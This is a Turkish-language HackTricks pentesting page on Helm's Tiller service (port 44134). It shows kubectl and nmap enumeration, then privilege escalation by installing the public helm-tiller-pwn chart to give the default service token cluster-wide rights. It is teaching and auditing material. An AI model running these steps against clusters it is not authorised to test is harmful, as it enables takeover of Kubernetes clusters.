44134 - Pentesting Tiller (Helm)

AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'a katılın!

HackTricks'ı desteklemenin diğer yolları:

Temel Bilgiler

Helm, Kubernetes için bir paket yöneticisidir. YAML dosyalarını paketleyip bunları genel ve özel depolarda dağıtmaya olanak sağlar. Bu paketlere Helm Charts denir. Tiller, varsayılan olarak 44134 portunda çalışan bir hizmettir.

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

Numaralandırma

Farklı ad alanlarının kapsayıcıları ve/veya hizmetleri numaralandırabiliyorsanız, onları numaralandırın ve isimlerinde "tiller" geçenleri arayın:

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Örnekler:

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

Bu hizmeti çalışırken bulmak için 44134 portunu kontrol etmeyi deneyebilirsiniz:

sudo nmap -sS -p 44134 <IP>

Bulduktan sonra, istemci helm uygulamasını indirerek onunla iletişim kurabilirsiniz. homebrew gibi araçları kullanabilir veya resmi sürümler sayfasına bakabilirsiniz. Daha fazla ayrıntı veya diğer seçenekler için kurulum kılavuzuna bakın.

Ardından, hizmeti numaralandırabilirsiniz:

helm --host tiller-deploy.kube-system:44134 version

Ayrıcalık Yükseltme

Varsayılan olarak Helm2, kube-system ad alanında yüksek ayrıcalıklarla kurulmuştur, bu yüzden servisi bulursanız ve erişiminiz varsa, bu size ayrıcalıkları yükseltme imkanı sağlayabilir.

Yapmanız gereken tek şey, şu gibi bir paket kurmaktır: https://github.com/Ruil1n/helm-tiller-pwn, bu paket varsayılan servis jetonuna tüm kümedeki her şeye erişim sağlar.

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart

http://rui0.cn/archives/1573 adresinde saldırının açıklamasını bulabilirsiniz, ancak temel olarak helm-tiller-pwn/pwnchart/templates/ içindeki clusterrole.yaml ve clusterrolebinding.yaml dosyalarını okursanız, tüm yetkilerin varsayılan belirteçe verildiğini görebilirsiniz.

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Last updated